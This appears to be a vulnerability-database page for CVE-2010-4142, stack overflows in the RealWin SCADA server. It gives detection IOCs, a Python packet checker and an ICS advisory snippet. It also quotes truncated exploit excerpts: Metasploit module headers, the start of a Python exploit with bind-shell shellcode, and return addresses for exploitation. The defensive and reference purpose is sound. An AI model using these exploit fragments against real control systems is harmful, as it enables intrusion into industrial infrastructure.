CVE-2010-4142
Published 2010-11-02
- Priority: P2 · 66
- CVSS 2.0: 10.0 (critical), vector AV:N/AC:L/Au:N/C:C/I:C/A:C
- Exploit: public exploit available
- EPSS: 63.57% (99.1th percentile)
Multiple stack-based buffer overflows in DATAC RealWin 2.0 Build 6.1.8.10 and earlier allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long (1) SCPC_INITIALIZE, (2) SCPC_INITIALIZE_RF, or (3) SCPC_TXTEVENT packet. NOTE: it was later reported that 1.06 is also affected by one of these requests.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| realflex | realwin | — | — |
| realflex | realwin | — | — |
Detection & IOCs (extracted from sources)
Byte patterns:
- 6a541264 00000002 00001ff4
- 6a541264 00000020 00001ff4
- 6a541264 00000010 00001ff4
- \x64\x12\x54\x6A\x20\x00\x00\x00\xF4\x1F\x00\x00
Notes:
- Detect exploit attempts by monitoring TCP port 912 for packets whose first 4 bytes are \x64\x12\x54\x6A (magic header common to all three exploit variants) followed by a large payload (>200 bytes).
- SCPC_INITIALIZE packets are identified by the second DWORD value 0x00000002; SCPC_INITIALIZE_RF by 0x00000020; SCPC_TXTEVENT by 0x00000010 — all on TCP/912.
- Payloads for all three packet types include a third DWORD of 0x00001ff4 (8180 decimal), indicating a large declared data length — flag any TCP/912 connection with this value in bytes 8-11.
- The overflow is triggered via sprintf()/strcpy() with attacker-controlled data; monitor for connections to TCP/912 from external/untrusted hosts on RealWin SCADA servers.
- Bad characters in Metasploit payloads are \x00\x20\x0a\x0d — absence of these bytes in a large TCP/912 payload is consistent with shellcode delivery.
- The Metasploit 'Universal' target RET addresses (0x4002da21 in FlexMLang.DLL 8.1.45.19, 0x4001f6d0/0x40017fc2) are version-specific; exploitation against other builds may require different gadgets.
- RealWin 1.06 is also confirmed affected by at least one of the overflow variants (SCPC_INITIALIZE_RF packet type based on the exploit header), not only 2.0 Build 6.1.8.10.
- No vendor fix was available at time of disclosure; detection and network-level blocking of TCP/912 from untrusted sources is the primary mitigation.
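As an added example (not code from any of the sources indexed on this page), a small Python checker that applies the TCP/912 header heuristics listed above to packet payloads; the header layout and byte values come from the notes above, while the sample packets, the 200-byte threshold and the function names are assumptions made for this example.

```python
import struct

# Header layout quoted in the notes above: 4-byte magic, then two little-endian
# DWORDs (packet type, declared data length), then the data. All constants come
# from those notes; the samples and the 200-byte threshold are assumptions.
MAGIC = b"\x64\x12\x54\x6a"                       # 0x6a541264 little-endian
PACKET_TYPES = {0x02: "SCPC_INITIALIZE",
                0x20: "SCPC_INITIALIZE_RF",
                0x10: "SCPC_TXTEVENT"}
DECLARED_LEN_IOC = 0x1FF4                         # 8180, seen in all three PoCs
PAYLOAD_THRESHOLD = 200                           # "large payload (>200 bytes)"
BADCHARS = b"\x00\x20\x0a\x0d"                    # Metasploit bad characters


def inspect_realwin_packet(data: bytes) -> dict:
    """Classify one TCP/912 payload; returns packet type and the reasons it was flagged."""
    verdict = {"suspicious": False, "packet_type": None, "reasons": []}
    if len(data) < 12 or data[:4] != MAGIC:
        return verdict                            # not an SCPC header, nothing to say
    ptype, declared_len = struct.unpack_from("<II", data, 4)
    verdict["packet_type"] = PACKET_TYPES.get(ptype, "unknown(0x%08x)" % ptype)
    payload = data[12:]
    if declared_len == DECLARED_LEN_IOC:
        verdict["reasons"].append("declared length 0x1ff4 matches PoC header")
    if len(payload) > PAYLOAD_THRESHOLD:
        verdict["reasons"].append("oversized payload (%d bytes)" % len(payload))
        # a large payload that avoids every bad character looks like encoded shellcode
        if not any(b in payload for b in BADCHARS):
            verdict["reasons"].append("large payload free of bad characters")
    verdict["suspicious"] = bool(verdict["reasons"])
    return verdict


def build_sample(ptype: int, payload: bytes, declared_len: int) -> bytes:
    """Constructed test input only: assemble a header in the layout above."""
    return MAGIC + struct.pack("<II", ptype, declared_len) + payload


# Constructed samples: a small well-formed request, an oversized one, unrelated traffic.
SAMPLES = {
    "small_init": build_sample(0x02, b"A" * 16, 16),
    "oversized_init_rf": build_sample(0x20, b"A" * 300, DECLARED_LEN_IOC),
    "not_scpc": b"GET / HTTP/1.1\r\n",
}

if __name__ == "__main__":
    for name, pkt in SAMPLES.items():
        print(name, inspect_realwin_packet(pkt))
```

In production the same checks would be expressed as an IDS rule on TCP/912 and the bad-character heuristic used only as a secondary score, since legitimate binary data can also avoid those four bytes.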
CISA ICS · 2018-09-06
GLEG Agora SCADA+ Exploit Pack (ICS Advisory, Alert Code ICSA-11-096-01, last revised September 06, 2018)
## Archived Content
In an effort to keep CISA.gov current, the archive contains outdated information that may not reflect current policy or programs.
## OVERVIEW
On March 15, 2011, GLEG Ltd. announced the Agora SCADA+ Exploit Pack for Immunity's CANVAS system. CANVAS is a penetration testing framework that is extensible using CANVAS Exploit Packs. On March 25, 2011, GLEG announced it would be adding exploits for the 35 vulnerabilities released by Luigi Auriemma on March 21, 2011. The ICS-CERT has not received any reports of this tool being used for an unauthorized compromise of an actual control system installation.
ICS-CERT has prepared t
GHSA · 2022-05-17 (unreviewed)
GHSA-8v2j-5pqf-5p2c [HIGH] CWE-119: Multiple stack-based buffer overflows in DATAC RealWin 2
Multiple stack-based buffer overflows in DATAC RealWin 2.0 Build 6.1.8.10 and earlier allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long (1) SCPC_INITIALIZE, (2) SCPC_INITIALIZE_RF, or (3) SCPC_TXTEVENT packet. NOTE: it was later reported that 1.06 is also affected by one of these requests.
No detection rules found.
Exploit-DB · 2010-11-30
DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_INITIALIZE Buffer Overflow (Metasploit)
---
```ruby
##
# $Id: realwin_scpc_initialize.rb 11180 2010-11-30 20:19:18Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'DATAC RealWin SCADA Server SCPC_INITIALIZE Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in DATAC Control
				International RealWin SCADA Server 2.0 (Build 6.1.8.10).
				By sending a specially crafted packet, an attacker may be able to execute arbitrary code.
			},
			'Author'         => [ 'Luigi Auriemma', '
```
Exploit-DB · 2010-11-30
DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_INITIALIZE_RF Buffer Overflow (Metasploit)
---
```ruby
##
# $Id: realwin_scpc_initialize_rf.rb 11180 2010-11-30 20:19:18Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'DATAC RealWin SCADA Server SCPC_INITIALIZE_RF Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in DATAC Control
				International RealWin SCADA Server 2.0 (Build 6.1.8.10).
				By sending a specially crafted packet, an attacker may be able to execute arbitrary code.
			},
			'Author'         => [ 'Luigi Aur
```
Exploit-DB · 2010-11-24
DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_TXTEVENT Buffer Overflow (Metasploit)
---
```ruby
##
# $Id: realwin_scpc_txtevent.rb 11125 2010-11-24 13:44:46Z mc $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'DATAC RealWin SCADA Server SCPC_TXTEVENT Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in DATAC Control
				International RealWin SCADA Server 2.0 (Build 6.1.8.10).
				By sending a specially crafted packet,
				an attacker may be able to execute arbitrary code.
			},
			'Author'         => [ 'Luigi Auriemma', 'MC' ],
			'L
```
Exploit-DB · 2010-10-27
DATAC RealWin SCADA Server 1.06 - Remote Buffer Overflow
---
```python
# Exploit Title: RealWin SCADA System SEH Overwrite
# Date: 10-27-10
# Author: Blake
# Software Link: http://www.realflex.com/products/realwin/realwin.php
# Version: 1.06
# Tested on: Windows XP SP3 running in VMware Workstation (rfx)

import socket, sys

if len(sys.argv) != 3:
    print "\n[*] Usage: %s <host> <port>\n" % sys.argv[0]
    sys.exit(0)

host = sys.argv[1]
port = int(sys.argv[2])  # port 912 by default

# windows/shell_bind_tcp - 368 bytes Encoder: x86/shikata_ga_nai
# LPORT=4444,
shellcode = (
"\xba\xe7\x26\x3b\xa1\x33\xc9\xb1\x56\xdb\xce\xd9\x74\x24\xf4"
"\x5d\x83\xc5\x04\x31\x55\x0b\x03\x55\xec\xc4\xce\x5d\x1a\x81"
"\x31\x9e\xda\xf2\xb8\x7b\xeb\x20\xde\x08\x59\xf5\x94\x5d\x51"
"\x7e\xf8\x75\xe2\xf2\xd5\x7a\x43\xb8\x03\xb4\x54\x0c\x8c\
```
Exploit-DB · 2010-10-15
DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - Buffer Overflow
---
Source: http://aluigi.org/adv/realwin_1-adv.txt
```text
#######################################################################

                             Luigi Auriemma

Application:  DATAC RealWin
              http://www.dataconline.com/software/realwin.php
              http://www.realflex.com
Versions:     <= 2.0 (Build 6.1.8.10)
Platforms:    Windows
Bugs:         A] stack overflow in SCPC_INITIALIZE and SCPC_INITIALIZE_RF
              B] stack overflow in SCPC_TXTEVENT
Exploitation: remote, versus server
Date:         15 Oct 2010
Author:       Luigi Auriemma
              e-mail: [email protected]
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bugs
3) The Code
4) Fix

#######################################################################

1) Introduction

"Re
```
Metasploit
DATAC RealWin SCADA Server SCPC_TXTEVENT Buffer Overflow
This module exploits a stack buffer overflow in DATAC Control International RealWin SCADA Server 2.0 (Build 6.1.8.10). By sending a specially crafted packet, an attacker may be able to execute arbitrary code.
Metasploit
DATAC RealWin SCADA Server SCPC_INITIALIZE_RF Buffer Overflow
This module exploits a stack buffer overflow in DATAC Control International RealWin SCADA Server 2.0 (Build 6.1.8.10). By sending a specially crafted packet, an attacker may be able to execute arbitrary code.
Metasploit
DATAC RealWin SCADA Server SCPC_INITIALIZE Buffer Overflow
This module exploits a stack buffer overflow in DATAC Control International RealWin SCADA Server 2.0 (Build 6.1.8.10). By sending a specially crafted packet, an attacker may be able to execute arbitrary code.
No writeups or analysis indexed.
References:
- http://aluigi.org/adv/realwin_1-adv.txt
- http://secunia.com/advisories/41849
- http://www.exploit-db.com/exploits/15259
- http://www.exploit-db.com/exploits/15337
- http://www.securityfocus.com/bid/44150